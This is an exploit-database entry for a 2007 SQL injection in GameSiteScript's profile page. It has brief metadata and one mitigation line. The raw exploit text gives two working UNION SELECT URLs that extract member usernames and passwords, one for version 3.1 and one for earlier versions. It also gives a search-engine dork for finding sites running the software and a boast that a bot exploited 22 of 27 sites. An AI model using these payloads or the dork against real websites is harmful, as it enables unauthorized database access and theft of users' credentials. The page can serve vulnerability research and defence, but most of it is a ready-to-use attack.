GameSiteScript (Profile)($id) SQL-Injection Exploit

vendor:

GameSiteScript

by:

Xenduer77

N/A

CVSS

N/A

SQL-Injection

CWE

Product Name: GameSiteScript

Affected Version From: Prior to version 3.1

Affected Version To: Version 3.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2007

GameSiteScript (Profile)($id) SQL-Injection Exploit

This exploit allows an attacker to perform SQL injection in the GameSiteScript profile page. The vulnerability was discovered by Xenduer77 on July 7th, 2007. The vulnerability occurs because the input parameter {$id} is passed straight to the query without being filtered.

Mitigation:

The vendor should implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

###############################################
####### GameSiteScript (Profile)($id) SQL-Injection Exploit
###############################################
### Vulnerability Discovered By: Xenduer77
### ---July 7th, 2007
###############################################

{$id} Is passed straight to the query without being filtered.

###############################################
SQL-INJECTION:
###############################################

For Version 3.1:
-------
http://whatever.com/iindex.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1

Prior To 3.1:
-------
http://whatever.com/index.php?params=profile/view/'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1

###Tested by a bot on 27 sites, 22 were exploited.

###############################################

Dork: "Powered by GameSiteScript"

###############################################

# milw0rm.com [2007-07-07]